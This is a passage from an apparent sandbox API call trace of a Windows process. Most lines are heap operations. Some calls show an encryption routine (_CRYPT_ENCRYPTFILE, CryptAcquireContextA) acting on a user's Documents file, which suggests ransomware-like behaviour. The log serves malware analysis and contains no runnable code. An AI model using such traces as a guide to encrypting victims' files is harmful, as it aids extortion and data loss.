hHeap=0x1780000) returned 1 [0075.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0075.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0075.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0075.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf770 | out: hHeap=0x1780000) returned 1 [0075.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0075.586] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0075.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0075.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0075.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0075.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0075.586] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0075.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0075.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0075.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0075.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0075.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0075.588] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0075.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0075.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0075.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0075.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0075.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0075.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0075.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0075.588] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0075.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9cb0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0075.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0075.589] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0075.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0075.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0075.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0075.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0075.589] CloseHandle (hObject=0x258) returned 1 [0075.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0075.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0075.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0075.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0075.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0075.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0075.590] FreeLibrary (hLibModule=0x772d0000) returned 1 [0075.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0075.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf518 | out: hHeap=0x1780000) returned 1 [0075.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0075.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0075.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0075.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0075.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0075.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0075.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0075.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0075.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0075.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0075.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0075.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0075.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0075.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0075.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0075.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0075.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0075.590] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0075.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0075.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0075.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0075.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0075.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5b8 | out: hHeap=0x1780000) returned 1 [0075.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0075.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0075.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0075.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0075.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0075.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0075.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0075.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0075.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0075.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0075.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0075.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0075.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0075.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0075.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0075.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0075.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0075.591] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0075.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0075.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0075.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0075.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0075.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0075.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0075.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0075.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0075.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0075.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0075.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0075.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0075.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0075.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0075.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0075.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0075.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0075.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0075.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0075.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0075.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0075.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0075.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0075.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0075.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0075.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0075.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0075.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0075.597] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\AGO5jVFwME.pptx", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17e287a0, ftCreationTime.dwHighDateTime=0x1d5b731, ftLastAccessTime.dwLowDateTime=0x1212f6b0, ftLastAccessTime.dwHighDateTime=0x1d572fe, ftLastWriteTime.dwLowDateTime=0x1212f6b0, ftLastWriteTime.dwHighDateTime=0x1d572fe, nFileSizeHigh=0x0, nFileSizeLow=0x11972, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="AGO5jVFwME.pptx", cAlternateFileName="AGO5JV~1.PPT")) returned 0x41ac500 [0075.597] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0075.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0075.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0075.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0075.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0075.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0075.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0075.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0075.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0075.598] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.598] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0075.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0075.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0075.598] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0075.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0075.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0075.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0075.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0075.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0075.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0075.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0075.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0075.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0075.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0075.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0075.598] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0075.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0075.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0075.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0075.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0075.599] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0075.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0075.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0075.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0075.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0075.599] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0075.599] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0075.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0075.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0075.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0075.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0075.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0075.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0075.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0075.600] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0075.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0075.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0075.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0075.600] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.600] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0075.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796f08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0075.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0075.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797108, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0075.601] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0075.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0075.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea2e0 [0075.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0075.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0075.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0075.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0075.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0075.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0075.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0075.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0075.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0075.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0075.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0075.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0075.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0075.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0075.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0075.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0075.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0075.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0075.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0075.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0075.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0075.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0075.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0075.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0075.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0075.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0075.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e93c8 [0075.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0075.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0075.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0075.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0075.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0075.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0075.604] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0075.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0075.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0075.604] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0075.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0075.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24a0 [0075.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0075.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0075.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0075.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0075.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4f0 [0075.604] RtlAllocateHeap (HeapHandle=0x1780000, 